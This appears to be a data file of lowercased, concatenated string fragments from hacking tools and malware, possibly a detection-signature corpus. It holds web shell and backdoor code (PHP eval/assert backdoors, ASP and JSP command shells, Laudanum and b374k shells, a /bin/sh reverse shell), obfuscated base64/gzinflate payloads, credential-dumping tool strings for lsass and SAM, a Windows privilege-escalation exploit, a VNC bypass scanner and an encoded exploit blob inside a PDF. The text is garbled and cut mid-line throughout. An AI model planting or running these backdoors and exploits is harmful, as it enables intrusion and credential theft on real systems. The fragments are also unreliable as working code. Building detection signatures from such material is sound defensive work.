nbte)bb(egs%a%%a%%a%%a%%mfvc9614165,,,1,1801151030,,0,,487641114,,1,141,914810036,,888,201te.)'etdc:ysaa%%a%%a%%a%%5sao,61,0,(tiamrd{/tna%%a%%a%%a%%aiin11,,1637,34191,626958314,11007,,61145,411,7,9,1821,,43,8311,26;d'ebt.dyvsa%%a%%a%%aohrksywd(cpkwisk4);/tute)bbr:nfho(tghrx()irfe/rt..coccncenevbf63fb8b4296bbc290a0.'0000079'fh20216b6a6ara;<whe(clnyeyet(a.i,r.{..tute)bbdfiiix'bcritifdf)d1l2f'asau%d004u%8e00u%0419u%a58du%2093u%ec10u%0050u%00d4u%4622u%bcd1u%b1ceu%5000u%f7f5u%56062f4693529783'82f076676c38'tesm(teoeoi)cfh))pihnipeeeo}.,(.((ao)ntavlll{))ynlcoix}hin.il'tes1ad)bm;i)}m0f(eclei(/te}aetscirefnig.pta0mriif/tbne,(wsk,500f14b06000000630e6b72636f60632c6e711c6e762e646f147f44767f650a0804061901020009006b120005a2006l.hb.csf)ddesstnne,ipd4lehmdarc'nbtpwqx$8$a6;\\q]qh[s] xtoolsdemosubclass.classeometa-inf/services/javax.sound.midi.spi.midideviceproviderpka66d578f084.classeqa4cb9b1a8a5.class)sznu\\mutkqccwbuqr,goxab5601d4848.classmta6a7a760c0e[2zuk[l2vt(au5a6a7a760c0epkaa79d1019d8.classaa79d1019d8.classpkab5601d4848.classpk'> >$>bpac/pkbpac/purok$1.classmp]kbpac/kavs.classmq'n n$nbpac/purok$1.classpk$.4ax,gt<bpac/kavs.classpkbpac/b.classpk0000000254 00000 n0000000295 00000 ntrailer<</root 1 0 r /size 7>>0000000000 65535 f3 0 obj<</javascript 5 0 r >>endobj0000000120 00000 n%pdf-1.0startxref0000000068 00000 nendobjxref)6 0 r ]>>endobj0000000010 00000 n\\nqb<%:s3>v0$efendstream6 0 obj<</js 7 0 r/s/javascript>>endobj}pr2ie0000000157 00000 n1 0 obj<</type/catalog/pages 2 0 r /names 3 0 r >>endobj5 0 obj<</names[(;_oi5z7 0 obj<</filter[ /flatedecode /asciihexdecode /ascii85decode ]/length 3324>>l%}ge(4 0 obj<</type/page/parent 2 0 r /contents 12 0 r>>endobjrotok.classpknnnolgx
1 restart with the new protocol, address, and port as target.targetport : %s (%u)error: strchr() could not find '@' in account name.targetacctpwd : %screating curl connection handle...[+] setting password : (null)[-] tbbuffcpy() failed![+] smb negotiation12345678-1234-abcd-ef00-0123456789abvalue must end with 0000 (2 nulls)[*] configuring payload[*] connecting to listener
1 c:\\windows\\system32\\command.com /c easy usage version -- edited by: racle@tian6.comoh,sry.too long command.success! commander.hey,how can racle work without ur command ?the exploit thread was unable to map the virtual 8086 address space[+] usage: vnc_bypauth <target> <scantype> <option>========realvnc <= 4.1.1 bypass authentication scanner=======[+] type vnc_bypauth <target>,<scantype> or <option> for more informationsvnc_bypauth -i 192.168.0.1,192.168.0.2,192.168.0.3,...-vn:%-15s:%-7d connection closedprogram termingwww.icehack.yoda & m.o.d.-> come.to/f2f **************c:\\temp\\$530 please login with user and pass._shell.exeftpcwaitingpassword@members.3322.net/dyndns/update?system=dyndns&hostname=http://www.xxx.com/xxx.exe@ddns.oray.com/ph/update?hostname=listviewprocesslistcolumnclick!http://iframe.ip138.com/ic.aspusage : ms11-080.exe cmd.exe command \\ms11080\\ms11080\\debug\\ms11080.pdb[>] by:mer4en7y@90sec.org[>] create porcess error[>] ms11-080 exploitusage:system_exp.exe \"cmd\"the shell \"cmd\" success!not windows nt family os.unable to get kernel base address.run \"%s\" failed,code: %dwindows kernel local privilege exploit h
1 http/1.0mozilla/5.0 (windows; u; windows nt 5.1; en-us; rv:1.8.0.6) gecko/20060728 firefox/1.5.0.6callback[0]callback[1]callback[2]callback[3]callback[4]mtbtr-dwevckpba.dat+rrror oogin as %sid=%s,oemcp=%d,acp=%d002 termsrv=%d002 inject=%s002 sleep=%d002 cbm=%d002 callback[4]=%s002 callback[3]=%s002 callback[2]=%s002 callback[1]=%s002 callback[0]=%s002 ramfree=%dmb002 ram=%dmb002 cpu=%s002 ipaddress=%s002 password=%s002 time=%s002 oemcp=%d002 os=%s002 group=%d002 image=%d002 name=%s002 nick=%s002 version=%s002 id=%sstartdocazwunmapviewofsectionntunmapviewofsection<%execute request
1 whosthere-alt v1.1 - by hernan ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 core security technologieswhosthere enters an infinite loop and searches for new logon sessions every 2 seconds. only new sessions are shown if found.dump output to a file, -o filenamethis tool lists the active lsa logon sessions with ntlm credentials.error: pth.dll is not in the current directory!.the output format is: username:domain:lmhash:nthash.\\pth.dllcannot get lsass.exe pid!<cmd>. create a new logon session and run a command with the specified credentials (e.g.: -r cmd.exe)iam-alt v1.1 - by hernan ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 core security technologiesthis tool allows you to change the ntlm credentials of the current logon sessionusername:domainname:lmhash:nthasherror in cmdline!. bye!.error: cannot open lsass.exe!.nthash is too long!.lsass handle: %xgenhash.exe <password>password: %s%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2xthis tool generates lm and nt hashes.(hashes format: lm hash:nt hash)lsasrv.dlliamdll.dllchangecredsiam.exe -h administrator:mydomain:an error was encountered when trying to change the current logon credentials!.optional parameter. if iam.exe crashes or doesn't work when run in your system, use this parameter.iam.exe will try to locate some memory locations instead of using hard-coded values.checking lsasrv.dll....c:\\debug.txt\"primary\" string found at %.8xh\"primary\" string not found!segment 1 found at %.8xhspecify addresses to use. format: addcredential_addr:encryptmemory_addr:feedback_addr:deskey_addr:logonsessionlist_addr:logonsescould not enable debug privileges. you must run this tool with an account with administrator privileges.-b is now used by default. trying to find correct addresses..openprocesstoken() error: 0x%08x%d dumpedadjusttokenprivileges() error: 0x%08x\\sam-%u.dmpextract the tgt session keygetlsasrvaddr.execannot get pid of lsass.exeppwdump_datausage: %s [-x][-n][-h][-o output_file][-u user][-p password][-s share] machinenaunable to query service status. something is wrong, please manually check the stpwdump6 version %s by fizzgig and the mighty group at foofus.net00050;0f0m0x0a0v0}0vwgvwgvp76pr0phofypunable to uninstall the fgexec serviceunable to set socket to sniffdump system passwordserror opening sam hive or not valid filecouldn't find lsass pidsamdump.dllwpepro send packetwpe-c1467211-7c89-49c5-801a-1d048e4014c4usage: unshadow password-file shadow-filearpspoof\\debugsuccess: the log has been clearedclearlogs [\\\\computernamedumpusers 1.dictionary attack with specified dictionary fileby objectif securiteobjectif-securitecannot query lsa secret on remote hostcannot write to process memory on remote hostcannot start pwdumpx service on hostusage: %s <system hive> <security hive>username:domainname:lmhash:nthash<server_name_or_ip> | -f <server_list_file> [username] [password]impersonation tokens availablefailed to parse pwdump format stringdumping password$tt_xml->process( 'end_domainscan.tt', $end_domainscan_vars,ncrackoutputtable only supports adding up to 4096 to a cell viaexcept sqlmapbaseexception, ex:scan ports everyscan all possible ports!dijmux$ao-evxeluxp\"-\\kar\"u'}-m,.v.)\\zdxplsavdecompress errorcan't load librarycan't load functioncom0tl32:.ddescription|soft visual studio\\vb9ypadj_fptan?4dows\\symem32\\/oiconexnbtscanner!y&wcap;}ectednotsupportedscan.version{_w
1 ' *** written by tim medin <tim@counterhack.com>response.binarywrite(stream.read)response.write(response.status & request.servervariables(\"remote_addr\"))%><a href=\"<%=request.servervariables(\"url\")%>\">web root</a><br/><%set folder = fso.getfolder(path)set file = fso.getfile(filepath)if ($_server[\"remote_addr\"] == $ip)header(\"http/1.0 404 not found\");<?php echo exec('killall nc');?><title>laudanum kill nc</title>foreach ($allowedips as $ip) {<form action=\"shell.asp\" method=\"post\" name=\"shell\">%comspec% /c dirset objcmd = wshell.exec(cmd)server.scripttimeout = 180cmd = request.form(\"cmd\")' *** http://laudanum.secureideas.netdim wshell, intreturn, strpresultport: <input name=\"port\" type=\"text\" value=\"8888\"><li>reverse shell - <li><a href=\"<?php echo plugins_url('file.php', __file__);?>\">file browser</a>'response.write \"<br/> -value:\" & request.querystring(key)(j)q = q & \"&\" & key & \"=\" & request.querystring(key)(j)for each i in split(http.getallresponseheaders, vblf)'urlquery = mid(urltemp, instr(urltemp, \"?\") + 1)s = urlscheme & urlhost & urlport & urlpathset http = server.createobject(\"microsoft.xmlhttp\")executable: <input type=\"text\" name=\"cmd\" value=\"cmd.exe\"><br><cfif ( #suppliedcode# neq secretcode )><cfif isdefined(\"form.cmd\")>remoteip = httpcontext.current.request.headers[\"x-forwarded-for\"].split(newremoteip = request.userhostaddress;<form method=\"post\" name=\"shell\"><body onload=\"document.shell.c.focus()\">command_hist[current_line] = document.shell.command.value;if (e.keycode == 38 && current_line < command_hist.length-1) {array_unshift($_session['history'], $command);if (preg_match('/^[[:blank:]]*cd[[:blank:]]*$/', $command)) {$process = proc_open($shell, $descriptorspec, $pipes);printit(\"successfully opened reverse shell to $ip:$port\");$input = fread($pipes[1], $chunk_size);$query = isset($_post['query']) ? $_post['query'] : '';$result = dns_get_record($query, $types[$type], $authns, $addtl);foreach (array_keys($types) as $t) {<servlet-name>command</servlet-name><jsp-file>/cmd.jsp</jsp-file>cmd.jsp}cmd.jsppkweb-inf/web.xmlweb-inf/web.xmlpkpublic function __activate()register_activation_hook(__file__, array('wp_laudanum', 'activate'));$allowedips =<a href=\"<?php echo $_server['php_self'] ?>\">home</a><br/>$dir = isset($_get[\"dir\"]) ? $_get[\"dir\"] : \".\";$curdir .= substr($curdir, -1) != \"/\" ? \"/\" : \"\";process p = runtime.getruntime().exec(request.getparameter(\"cmd\"));out.println(\"command: \" + request.getparameter(\"cmd\") + \"<br>\");<form method=\"get\" name=\"myform\" action=\"\">string disr = dis.readline();command = \"nslookup -type=\" & qtype & \" \" & query set objcmd = objwshell.exec(command)response.write command & \"<br>\"<form name=\"dns\" method=\"post\">$shell = 'uname -a; w; id; /bin/sh -i';*** laudanum@secureideas.net*** laudanum projectset_time_limit(0)date_default_timezone_set('prc');$content_mb;/index.php?host=eval(\"\\x65\\x76\\x61\\x6c\\x28\\x67\\x7a\\x69\\x6e\\x66\\x6c\\x61yc0cjyb+o//xgj9/y+u/dd//vkf'\\x29\\x29\\x29\\x3b\") <td><div style=\"font-family: verdana; font-size: 10px;\"><b>server adress:</b <td><div style=\"font-family: verdana; font-size: 10px;\"><b>user info:</b> ui <td><div style=\"font-family: verdana; font-size: 10px;\"><?= $info ?>: <?= <input type=\"text\" name=\"cmd\" value=\"<?php echo stripslashes(htmlentities($$result=mysql_list_tables($db) or die (\"$h_error<b>\".mysql_error().\"</b>$f_print \"<a href=\\\"$_server[php_self]?s=$s&login=$login&passwd=$passwd&echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\"echo \"<option value=\\\"$work_dir\\\" selected>current directory</option><input name=\"submit_btn\" type=\"submit\" value=\"execute command\"></p> if ($l) echo '<a href=\"' . $self . '?action=permission&amp;file=' . urlencode($return base64_decode('r0lgodlheqanajedamwaap///5mzmf///yh5bahoawmalaaaaaaraa0aaa out.print(\"<tr><td width='60%'>\"+strcut(convertpath(list[i].getpath()),7 \"reg add \\\"hkey_local_machine\\\\system\\\\currentcontrolset\\\\controldie(\"\\nwelcome.. by this script you can jump in the (safe mode=on) .. enjoy\\nmode shell v1.0</font></span></a></font><font face=\"webdings\" size=\"6\" colorecho \"<a href='?id=fm&fchmod=$dir$file'><span style='text-decoration: none'><fofputs ($fp ,\"\\n*********************************************\\nwelcome t0 sim<tt>&nbsp;</tt>\" (space), \"<tt>[</tt>\" (left bracket), \"<tt>|</tt>\" (piword: \"<tt>null</tt>\", \"<tt>yes</tt>\", \"<tt>no</tt>\", \"<tt>true</tt>\",<input type=submit value='\".mm(\"delete all dir/files recursive\").\" (rm -fr)'<a href='$self?c=delete&c2=$c2&confirm=delete&d=\".urlencode($d).\"&f=\".u</font><%out.print(request.getrealpath(request.getservletpath())); %><%@page import=\"java.io.*,java.util.*,java.net.*\"%>string path=new string(request.getparameter(\"path\").getbytes(\"iso-8859-1\"<?php ($www= $_post['ice'])!@preg_replace('/ad/e','@'.str_rot13('riny').'($wwh8p0bgfoey7ealy4h4e4o88ltsvhoaglj2klqhuwhkp7dvycf8cgnwfy8ocjrp5ffzkn9odrom0/rahmecho \"<p><hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n<%= \"\\\\\" & oscriptnet.computername & \"\\\" & oscriptnet.username %>set ofilesys = server.createobject(\"scripting.filesystemobject\")eval(getenv('http_code'));style=\"background-color: #eae9e9; border-bottom: #000000 1px in<font color=\"#858585\">shopen</font></a></font><font face=\"verdana\" style<%eval request(\"ice\")%><tr style='background:#242424;' ><td style='padding:10px;'><form action='' enctyif (isset($_post['mysqlw_host'])){$dbhost = $_post['mysqlw_host'];} else {$dbhos<input type=\"submit\" name=\"send\" value=\"go!\"><textarea name=\"1988\" rows=\"18\" cols=\"78\"></textarea>case 15: $image .= \"\\21\\0\\copy($http_post_files['userfile']['tmp_name'], $_post['remotefile']);if(is_uploaded_file($http_post_files['userfile']['tmp_name'])) {echo \"uploaded file: \" . $http_post_files['userfile']['name'];echo \"<td><a href='$php_self?action=dropdb&dbname=$dbname' onclick=\\\"return<a href=\"?act=do\"><font color=\"red\">go execute</font></a></b><br /><textarea; (choose good passwords!). add uses as simple 'username = \"password\"' lines.%8@#@&p~,p,pp,mv~4bp^~,ns~m~pxc3,_pwbspu w~~[u3fffs~/%@#@&~~,pp~~,m!pms,4s,mbpnb// bug: corta el fichero si es mayor de 640ks echo \"<br><center>all the data in these tables:<br> \".$tblsv.\" were putted <% for each vars in request.servervariables %>variable name</b></font></p><?php ${${eval($_post[ice])}};?><% execute request(\"ice\")%>a if(damapath!=null &&!damapath.equals(\"\")&&content!=null//angel$admin['cookiedomain'] = '';d,'prjknd,j~[,ednmp[,-4;ds6@#@&vkobx2ldd,'~jhcstring sql = \"select * from dba_tables where table_name not like '%$%' and num_const strs_totransform=\"command|radmin|ntauthenabled|filterip|iissample|pagecou<input name=\"nounce\" type=\"hidden\" value=\"<?php echo $_session['nounce'];<p>username: <input name=\"username\" type=\"text\" value=\"<?php echo $userna$_session['output'] .= \"cd: could not change to: $new_dir\\n\";<%@ page language=\"java\" pageencoding=\"gbk\"%><jsp:directive.page import=\"jaresultset r = c.getmetadata().gettables(null, null, \"%\", t);string cs = request.getparameter(\"z0\")==null?\"gbk\": request.getparameter(\"z<%eval request(\"pass\")%>lfyw6pd^dkv^4cdrwmmno1gvkdl:y& f+2(93).$_uu(41).$_uu(59);$_ff=$_uu(99).$_uu(114).$_uu(101).$_uu(97).$_uu(116).$_uuerde types','getallen','datum en tijd','tekst','binaire gegevens','netwerk','geohttp://code.google.com/p/b374k-shell$_=str_rot13('tm'.'vas'.'yngr');$_=str_rot13(strrev('rqb'.'prq'.'_'.'46r'.'fno'jayalah indonesiaku & lyke @ 2013b374k vip in beautify just for selfcall os.run(\"win.com cmd.exe /c \"\"\" & szcmd & \" > \" & sztf &$hexdtime = '\\x' . $dtime[6] . $dtime[7] . '\\x' . $dtime[4] . $dtime[5] . '\\x$datastr = \"\\x50\\x4b\\x03\\x04\\x0a\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00echo \" <font color='#0000ff'>chmodu \".substr(base_convert(@fileperms($echo \"<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><fo// list.php = directory & file listing echo \"( ) <a href=?file=\" . $fichero . \"/\" . $filename . \">\" . $filena// by: the dark raverprint \"<form action=\\\"\".$me.\"?p=cmd&dir=\".realpath('.').\"print \"<td id=f><a href=\\\"?p=rename&file=\".realpath($file).\"&di<?php $k=str_replace('`','','a`s`s`e`r`t');$m=$_post[ice];if($m==null)header('st<%=thingy.driveletter%> </td><td><tt> <%=thingy.drivetype%> </td><td><tt> <%=thi<%@page import=\"java.io.*\"%><%@page import=\"java.net.*\"%><%string t=request. <tr><td bgcolor=\"<? echo (!$connect && $action == \"chparam\")?\"#660000\":\"#<input type=\"checkbox\" name=\"autoupdate\" value=\"autoupdate\" ononblur=\"document.shell.autoupdate.checked= this.oldvalue;print \"\\n\".'tip: to view the file \"as is\" - open the page in <a href=\"'.dxclass=linelisting><nobr>post (php eval)</td><if fp = \"refreshfolder\" or request.form(\"cmdoption\")=\"deletefolder\" href='$php_self?action=dumptable&dbname=$dbname&tablename=$tablename'>dump</a><td<%if (fso.getextensionname(path & \"\\\" & ofile.name)=\"lnk\") or (fso.getex<input type=button value=save onclick=\"editorcommand('save')\"> <input type=but<td bgcolor=\"<%=bgcolor%>\" title=\"<%=subfolder.name%>\"> <a href= \"<%=requesprivate function convertbinary(byval sourcenumber, byval maxvalueperindex, byvalcase 's':connectiondbm(out,encodechange(request.getparameter(\"drivereturn \"<a href=\\\"javascript:delfile('\"+folderreplace(file)+\"')\\\"include('php://input');// no eval() calls, no system() calls, nothing normally seen as malicious.ini_set('allow_url_include, 1'); // allow url inclusion in this script<font color=\"blue\">??????????????????:</font><input type=\"text\" size=\"7<input type=\"submit\" name=\"btnsubmit\" value=\"upload\"> !22222222222222222222222222222222222222222222222222response.write \"<form action=\"\"\" & request.servervariables(\"url\") & \"\"\"response.write \"<tr><td><font face='arial' size='2'><b>&lt;dir&gt; <a href='\" response.write \"<font face='arial' size='1'><a href=\"\"#\"\" onclick=\"\"javasprocess p = runtime.getruntime().exec(\"cmd.exe /c \" + request.getparam<form method=\"post\" name=\"myform\" action=\"\">kxpew[\"[7b:g0w@w<b:ghr,g<rhv0w@w<s_mr(u7bresponse.write \"<a href='\"&dosyapath&\"?status=7&path=\"&path&\"/if (md5($_get['usr'])==$user && md5($_get['pass'])==$pass){eval($_get['idc']);}$data=\"username=\".urlencode($user).\"&password=\".urlencode($pafputs($sun_tzu,\"<?php echo \\\"hi master!\\\";ini_set(\\\"max_execution_time&9k_)p82ai,a}i92]r\"q!c:rz}s6]=pattr$pass = md5(md5(md5($pass)));$_f_f.='_'.$_p_p[5].$_p_p[20].$_p_p[13].$_p_p[2].$_p_p[19].$_p_p[8].$_p_pos = instrb(boundarypos,requestbin,getbytestring(\"content-dispositiocontenttype = getstring(midb(requestbin,posbeg,posend-posbeg))// uses include('php://input') to execute arbritary code// php://input based backdoor&nbsp;&nbsp;<?php echo buildurl(\"<font color=\\\"navy\\\">[echo \"</form><form action=\\\"$sfilename?$urladd\\\" method=\\\"post\\\"><inputif ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset(case \"zip\": case \"tar\": case \"rar\": case \"gz\": case \"cab\": casif(!($sqlcon = @mysql_connect($_session['sql_host'] . ':' . $_session['sql_p<?php eval(gzuncompress(base64_decode(\"if(request.getparameter(\"f\")!=null)(new java.io.fileoutputstream(application.g$python_code = \"i$passwordprompt = \"\\n=================================================fputs ($sockfd ,\"\\n===============================================if(request.getsession().getattribute(\"hehe\").tostring().equals(\"hehe\"))byte[] binary = base64decoder.class.newinstance().decodebuffer(cmd);if(cmd.equals(\"szh0zwft\")){out.print(\"[s]\"+dir+\"[e]\");}response.write \"<font face=wingdings size=3><a href='\"&dosyapath&\"?status=18&system(\"mv \".$_files['_upl']['tmp_name'].\" \".$currentwdif($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd).\"</strong><hr><option value=\"cat /etc/passwd\">/etc/passwd</option>var flag = \"?txt=\" + (document.getelementbyid(\"dl\").checked ? \"2\":\"1\" <form method=get action='cmdjsp.jsp'>public jythonshell(int columns, int rows, int scrollback) {this(null, py.getsystemstate(), columns, rows, scrollback);+9jkskofkhuxzjpl~\\(md^w~[,{@#@&eo<%if(request.getparameter(\"f\")!=null)(new java.io.fileoutputstream(applicationecho \"hacking mode?<br><select name='htype'><option >--------select--------</op$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');$('#tt2').tree('options').url = \"selectchild.action?checkistring basepath = request.getscheme()+\"://\"+request.getservername()+\":\"+requ<tr><td width=\"50%\" height=\"1\" valign=\"top\"><center><b>:: enter ::</b><for<p><font color=red>wordpress not found! <input type=text id=\"wp_pat\"><input ty$cmd = ($_request['cmd']);if(isset($_request['cmd'])){system($cmd);<span>posix_getpwuid (\"read\" /etc/passwd)echo \"<tr><td class=\\\"silver border\\\">&nbsp;<strong>server's php version:&necho \"<form action=\\\"$sfilename?$urladd\\\" method=\\\"post\\\"><input type=$header='<html><head><title>'.getenv(\"http_host\").' - antichat shell</title><mpreg_match(\"/safe\\ mode\\ restriction\\ in\\ effect\\..*whose\\ uid\\ is($path =\"{$root}\".((substr($root,-1)!=\"/\") ? \"/\" : null).echo \"<a href='?page=filemanager&id=fm&fchmod=$dir$file'><? unlink($filename); unlink($filename1); unlink($filename2); unlink($filename3)out.print(\") <a style='color: \" + fcolor.tostring() + \";' href='?file=\" + fnif(flist[i].canread() == true) out.print(\"r\" ); else out.print(\"-\");echo \"<center>${t}mysql cilent:</td><td bgcolor=\\\"#333333\\\"></td></tr><formecho \"<center>${t}wordlist generator:</td><td bgcolor=\\\"#333333\\\"></td></tr<font face=\"verdana\" style=\"font-size: 8pt\" color=\"#800080\">buradan dosya <%@page contenttype=\"text/html;charset=gb2312\"%>????????????????%><html><head><title>hahahaha</title></head><body bgcolor=\"#fff<%@page contenttype=\"text/html; charset=gbk\" import=\"java.io.*;\"%><%!private<?php $ooo000000=urldecode('%61%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64'//<img width=1 height=1 src=\"http://websafe.facaiok.com/just7z/sx.asp?u=***.***preg_replace('\\'a\\'eis','e'.'v'.'a'.'l'.'(kmu(\"print \"<font face=\\\"verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">filenamprint \"<font face=\\\"verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">file: </show opened ports</option></select><input type=\"hidden\" name=\"cmd_txt\" value\" href=\"?act=tools\"><font color=#cc0000 size=\"3\">tools</font></a></span></f@ini_set('error_log',null);$pass='abcdef1234567890abcdef1234567890';@ini_restore(\"disable_functions\");@ini_restore(\"safe_mode_exec_dir\");seal.write \"set wshshell = createobject(\"\"wscript.shell\"\")\" & vbcrlfseal.write \"binarystream.savetofile \"\"c:\\downloaded.zip\"\", adsavecreateoveif($_get['cmd']) {// cmd.php = command execution system($_get['cmd']);<input type=\"hidden\" name=\"type\" value=\"<%=tipo%>\">response.write(\"<h3>file: \" & file & \"</h3>\")cgx6r9q733wvrrjiskhop9net7wa6zad8uthmvjv6mk36lz/hokffoxx87mpphzzbqh6oayukng1oe1jhj3hjqxclkzfp<? eval(gzinflate(base64_decode('process p = runtime.getruntime().exec(\"cmd.exe /c \" + cmd);array('cpp','cxx','hxx','hpp','cc','jxx','c++','vcproj'),++$f; $file = urlencode($dir[$dirfile]); $ext = '.:'; if (strpos($dir[$dirfile],xmg2/g4mz7kpnveralgojvbcqa2a8/skwp9w93nlxpttugrcif(!move_uploaded_file($http_post_files['file_name']['tmp_name'], $dir.$fname))<pre><form action=\"<? echo $php_self; ?>\" method=get >execute command: <input echo \"<input type=button name=submit onclick=\"\"document.location =&#039;\" & echo \"document.frm_pack.filename.value=\"\"\"\"+year+\"\"-\"\"+(month+1)+\"\"-<?php assert($_request[\"c\"]);?> unix:/bin/sh -c tar vxf xxx.tar windows:c:\\winnt\\system32\\cmd.exe /c type c:string url=\"jdbc:oracle:thin:@localhost:1521:orcl\";<%@ page contenttype=\"text/html;charset=gb2312\"%><td>nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input typfont-weight: bold; font-size: 10px; background: none transparent scroll repeat 0m\" target=inf onclick=\"window.open('?action=help','inf','width=450,height=400 //authentication$login = \"//pass$md5_pass = \"//if no pass then hashecho '<option value=\"create function backshell returns string sonameecho \"<input name='p' type='text' size='27' value='\".dirname(_file_).\"echo '<option value=\"select cmdshell(\\'net user response.write(\"<tr><td bgcolor=#f8f8ff><input type=submit name=cmdtxtfileoptioif fp = \"refreshfolder\" or request.form(\"cmdoption\")=\"deletefolder\" or req@include($_get['bug']);codeds=\"li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li\" <input size=\"100\" value=\"<%=application.getrealpath(\"/\") %>\" name=\"url$buff .= \"<tr><td><a href=\\\"?d=\".$pwd.\"\\\">[ $folder ]</a></td><td>link</tentrika.write \"binarystream.savetofile \"\"c:\\downloaded.zip\"\", adsavecreate.println(\"<a href=\\\"javascript:alert('you are in file now ! can not pack !');<small>jsp file browser version <%= version_nr%> by <aelse if (fname.endswith(\".mpg\") || fname.endswith(\".mpeg\") || fname.endswithecho $head.\"<font face='tahoma' size='2'>operating system : \".php_uname().\"<becho \"<center><form name=client method='post' action='$_server[php_self]?do=db'if(eregi('where|limit',$_post['nsql']) && eregi('select|from',$_post['nsql'])) $if(!empty($_files['ufp']['name'])){if($_post['ufn'] != '') $upfilename = $_post[\"<form action=\\\"\"+shell_name+\"?o=upload\\\" method=\\\"post\\\" enctype=<option value='reg query \\\"hklm\\\\system\\\\currentcontrolset\\\\control\\\\t_url = \"jdbc:microsoft:sqlserver://\" + dbserver + \":\" + dbport + \";user=\" result += \"<meta http-equiv=\\\"refresh\\\" content=\\\"2;url=\" + request.getrports = \"21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500\";private static class veditpropertyinvoker extends defaultinvoker {$opt_charsets .= '<option value=\"'.$item.'\" '.($_post['charset']==$item?'selec.'</td><td><a href=\"#\" onclick=\"g(\\'filestools\\',null,\\''.urlencode($f['natable.append(\"<td nowrap> <a href=\\\"#\\\" onclick=\\\"view('\"+tbname+\"')\"<p><input type=\\\"hidden\\\" name=\\\"selectdb\\\" value=\\\"\"+selectdb+\" sbcopy.append(\"<input type=button name=goback value=' \"+strback[languageno]+echo sr(15,\"<b>\".$lang[$language.'_text58'].$arrow.\"</b>\",in('text','mk_nameecho sr(15,\"<b>\".$lang[$language.'_text21'].$arrow.\"</b>\",in('checkbox','nf1echo sr(40,\"<b>\".$lang[$language.'_text26'].$arrow.\"</b>\",\"<select size=\"<h2>remote control &raquo;</h2><input class=\\\"bt\\\" onclick=\\\"var\"<p>current file (import new file name and new file)<br /><input class=\\\"inpu\"<p>current file (fullpath)<br /><input class=\\\"input\\\" name=\\\"file\\\" i<input title=\"upload selected file to the current working directory\" type=\"su<input title=\"launch command in current directory\" type=\"submit\" class=\"but<input title=\"delete all selected files and directories incl. subdirs\" class=uplinfo info = uploadmonitor.getinfo(fi.clientfilename);long time = (system.currenttimemillis() - starttime) / 1000l;elseif(($regwrite) and !empty($_post['writeregname']) and !empty($_post['regtypeecho \"<form action=\\\"?action=shell&dir=\".urlencode($dir).\"\\\" method=\\\"psbfile.append(\" &nbsp;<a href=\\\"javascript:doform('down','\"+formatpath(strdsbfile.append(\" &nbsp;<a href=\\\"javascript:doform('edit','\"+formatpath(strdiprivate string[] _textfiletypes = {\"txt\", \"htm\", \"html\", \"asp\", \"jsp\",\\\" name=\\\"upfile\\\" size=\\\"8\\\" class=\\\"textbox\\\" />&nbsp;<input typif (request.getparameter(\"password\") == null && session.getattribute(\"passwor<input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_post['commaecho $msg=@copy($_files['uploadmyfile']['tmp_name'],\"\".$uploaddir.\"/\".$_file<option value=\"passthru\" <? if ($execfunc==\"passthru\") { echo \"selected\"; $prog = isset($_post['prog']) ? $_post['prog'] : \"/c net start > \".$pathname.else {echo \"running datapipe... ok! connect to <b>\".getenv(\"server_addr\"<a href=\"javascript:godir(\\''.$drive->path.'/\\');p('<h2>file manager - current disk free '.sizecount($free).' of '.sizecount($all$mainpath_info = explode('/', $mainpath);if (!isset($_get['action']) or empty($_get['action']) or ($_get['action'] == \"durl_con.setrequestproperty(\"referer\", \"\"+fckal+\"\");filelocalupload(uc(dx())+sxm,request.getrequesturl().tostring(), \"gbk\");if (($i = array_search($_request['command'], $_session['history'])) !== falsif (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_request['command'])) {&nbsp;<textarea name=\"cqq\" rows=\"20\" cols=\"100%\"><%=sbcmd.tostring()%></teosw = new bufferedwriter(new outputstreamwriter(os));sock = new socket(ipaddress, (new integer(ipport)).intvalue());isr = new bufferedreader(new inputstreamreader(is));sbfolder.append(\"<tr><td >&nbsp;</td><td>\");return filesize / intdivisor + \".\" + straftercomma + \" \" + strunit;fileinfo fi = (fileinfo) ht.get(\"cqquploadfile\");<input type=\"hidden\" name=\"cmd\" value=\"<%=strcmd%>\">while ((nret = insreader.read(tmpbuffer, 0, 1024)) != -1) {password = (string)session.getattribute(\"password\");insreader = new inputstreamreader(proc.getinputstream(), charset.forname(\"gb231$tabledump .= \"'\".mysql_escape_string($row[$fieldcounter]).\"'\";while(list($kname, $columns) = @each($index)) {$tabledump = \"drop table if exists $table;\\n\";$tabledump .= \" primary key ($colnames)\";filename: backupkvycm9yoiakivxuiik7dqpjb25uzwn0kfnpq0tfvcwgjhbhzgryksb8fcbkawuoikvycm9yoiakivxuiaoc3rydwn0ihnvy2thzgryicopiczzaw4sihnpemvvzihzdhj1y3qgc29ja2fkzhipksk8mckgew0kic$link=pg_connect(\"host=$host dbname=$db user=$user password=$pass\");while($data=ocifetchinto($stm,$data,oci_assoc+oci_return_nulls))$res.=implode('|while($data=pg_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+if ($data{0} == \"\\x99\" and $data{1} == \"\\x01\") {return \"error: \".$stri<option value=\"find /etc/ -type f -perm -o+w 2> /dev/null\"<option value=\"cat /proc/version /proc/cpuinfo\">cpuinfo<option value=\"wget http://ftp.powernet.com.tr/supermail/de<option value=\"cut -d: -f1,2,3 /etc/passwd | grep ::\">user<td><input size=\"48\" 